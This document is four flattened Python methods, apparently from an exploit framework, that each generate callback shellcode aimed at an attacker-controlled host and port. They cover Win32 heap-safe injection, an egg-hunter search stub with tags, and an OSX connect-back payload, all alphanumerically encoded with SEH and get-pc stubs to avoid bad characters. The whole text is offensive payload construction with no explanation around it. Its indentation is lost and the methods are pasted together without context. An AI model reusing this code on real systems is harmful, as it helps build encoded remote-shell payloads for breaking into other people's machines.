def createShellcode(self): if self.callback: host = self.callback.ip port = self.callback.port self.shellcode = self.createHeapSafeInject(self.badstring, host, port) encoder = alphanumeric.AlphaNum() totopc = encoder.seh_pc() getpc = encoder.get_pc(reg='ecx') payload = encoder.encode(self.shellcode) self.shellcode = totopc + getpc + payload
def createShellcode(self): if self.callback: host = self.callback.ip port = self.callback.port self.createWin32SearchShellcode(host, port) encoder = alphanumeric.AlphaNum() totopc = encoder.seh_pc() getpc = encoder.get_pc(reg='ecx') payload = encoder.encode(self.encodedsearchcode) self.encodedsearchcode = totopc + getpc + payload
def createShellcode(self): host = self.callback.ip port = self.callback.port from shellcode.standalone.osx.payloads import payloads from encoder import alphanumeric self.log("OSX X86 Shellcode %d" % self.version) p = payloads(self) self.shellcode = p.assemble(p.callback(host, port, universal=True, fork_exit=False)) encoder = alphanumeric.AlphaNum() get_pc = encoder.get_pc(reg='eax') self.shellcode = get_pc + encoder.encode(self.shellcode) self.log("Shellcode size: %d" % len(self.shellcode)) self.log(prettyhexprint(self.shellcode))
def createShellcode(self): if self.callback: host = self.callback.ip port = self.callback.port encoder = alphanumeric.AlphaNum() totopc = encoder.seh_pc() getpc = encoder.get_pc(reg='ecx') self.shellcode = self.createHeapSafeInject(self.badstring, host, port) self.tag1 = "D2D2" self.tag2 = "2D2D" payload = encoder.encode(self.shellcode) self.shellcode = totopc + getpc + payload self.shellcode = self.tag2 + self.tag1 + self.shellcode self.searchcode = win32shell.getsearchcode(self.tag1, self.tag2) self.encodedsearchcode = self.intel_encode(self.searchbadstring, self.searchcode) payload = encoder.encode(self.encodedsearchcode) self.encodedsearchcode = totopc + getpc + payload